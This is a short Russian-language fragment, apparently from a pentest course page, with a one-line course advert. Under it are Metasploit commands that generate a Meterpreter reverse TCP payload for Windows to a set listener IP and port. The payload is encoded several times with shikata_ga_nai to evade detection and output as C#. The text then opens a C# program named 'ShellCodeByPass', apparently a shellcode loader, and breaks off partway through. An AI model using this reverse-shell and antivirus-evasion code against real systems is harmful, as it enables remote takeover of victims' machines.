Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
use windows/meterpreter/reverse_tcp
set LHOST 192.168.1.237
set LPORT 1338
set EXITFUNC thread
generate -e x86/shikata_ga_nai -b '\x00' -i 3 -t csharp
using System;
using System.Runtime.InteropServices;
namespace ShellCodeByPass
{
public class Program
{
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}...